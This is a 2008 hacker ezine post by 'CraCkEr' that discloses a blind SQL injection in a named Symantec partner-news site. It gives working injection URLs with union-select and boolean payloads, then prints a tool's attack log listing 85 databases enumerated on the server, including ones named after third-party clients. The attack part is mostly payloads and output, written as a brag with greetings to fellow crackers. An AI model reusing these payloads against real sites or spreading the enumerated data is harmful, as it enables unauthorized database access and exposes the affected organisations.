symantec-sql.txt

`┌┌───────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────┐  
┌┘ [ EZINE ] ┌┘  
└───────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr : : :  
│ Website : symantec.com │ │ Famous Sites Can Be │  
│ Vuln Type: Blind SQL Injection │ │ │  
│ Method : GET │ │ Olso Vulned │  
│ Critical : High [░░▒▒▓▓██] │ │ │  
│ Impact : Database access │ │ │  
│ ────────────────────────────────────┘ └─────────────────────────────────── │  
│ DALnet #crackers ┌┘  
└───────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ Typically used for remotely exploitable vulnerabilities that can lead to │  
│ system compromise. │  
│ │  
  
┌┌───────────────────────────────────────────────────────────────────────────┐  
┌┘ Exploit URL's ┌┘  
└───────────────────────────────────────────────────────────────────────────┘┘  
  
[+] Remote SQL  
  
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=-1 union select 1,2,3--  
  
  
[+] Blind SQL  
  
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=1  
  
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=0  
  
  
[+] Text Change  
  
Bedriftsfordelene ved sosiale nettverk  
  
  
[+] Attack Results  
  
  
[+] URL:http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1  
[+] Proxy Not Given  
[+] Gathering MySQL Server Configuration...  
[+] MySQL >= v5.0.0 found!  
[+] Showing all databases current user has access too!  
[+] 18:00:05  
[+] Number of Rows: 85  
[0]: hv_kompaktseminar_2008   
[1]: 3ds_statistics   
[2]: channelevent   
[3]: cpu_expertenforum_2008   
[4]: cpu_xmas_2007   
[5]: db_bt   
[6]: db_bt2008   
[7]: db_elearning   
[8]: db_elearning2   
[9]: db_farbreiz   
[10]: db_hpcd   
[11]: db_jsdesk   
[12]: db_pepper_oktoberfest2008   
[13]: db_ship   
[14]: db_shop   
[15]: db_shrek   
[16]: db_shrek_handover   
[17]: db_symantec   
[18]: db_wordstock   
[19]: demo_3ds_statistics   
[20]: demo_ajaxfb   
[21]: demo_bettgefluester   
[22]: demo_compel_bs   
[23]: demo_compel_tec   
[24]: demo_db_elearning   
[25]: demo_hp_smb_portal   
[26]: demo_hpsmartportal   
[27]: demo_hpsmartportal_at   
[28]: demo_hpsmartportal_at_ch   
[29]: demo_hpsmartportal_ch   
[30]: demo_hpsmartportal_de   
[31]: demo_hpsmartportal_nl   
[32]: demo_hpsmartportal_nl_int   
[33]: demo_iqpower   
[34]: demo_kanalm   
[35]: demo_panadress   
[36]: demo_panadress_old   
[37]: demo_pepper_joomla   
[38]: demo_pepper_website   
[39]: demo_pepperglobal   
[40]: demo_pepperglobal_new   
[41]: demo_phpproject   
[42]: demo_preferred   
[43]: demo_preferred_demo   
[44]: demo_symantec   
[45]: demo_test   
[46]: demo_zukunftspodium   
[47]: hp_elearning   
[48]: hp_elearning_2   
[49]: hp_mobiles-rechenzentrum   
[50]: hp_mobiles-rechenzentrum_handover   
[51]: hp_smb_portal   
[52]: hv_management_2007   
[53]: hv_management_2008   
[54]: linde_ltip_08   
[55]: linde_mtip_07   
[56]: linde_tilia_edm   
[57]: mysql   
[58]: oktoberfest2007   
[59]: oktoberfest_2008   
[60]: opengeodb   
[61]: partnernews_sep09   
[62]: pepperglobal   
[63]: pepperglobal_new   
[64]: pepperglobal_statistics   
[65]: phpmyadmin   
[66]: preferred   
[67]: preferred_handover   
[68]: remoteshell   
[69]: robertdill   
[70]: symantec_ddc_2   
[71]: symantec_partnernews   
[72]: symantec_partnernews_0108   
[73]: symantec_partnernews_0208   
[74]: symantec_partnernews_0308   
[75]: symantec_partnernews_0408   
[76]: symantec_partnernews_0508   
[77]: symantec_partnernews_0608   
[78]: symantec_partnernews_0708   
[79]: symantec_partnernews_0908   
[80]: symantec_partnernews_handover   
[81]: symantec_wordstock   
[82]: tenovis_wcp_3_0   
[83]: transcat_statistics   
[84]: webcast_portal_3_3   
[-] 00:58:04  
[-] Total URL Requests 10602  
[-] Done  
  
  
└────────────────────────────────────────────────────────────────────────────┘  
  
Greets:  
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .  
  
┌┌───────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2008 ┌┘  
└───────────────────────────────────────────────────────────────────────────┘┘  
  
`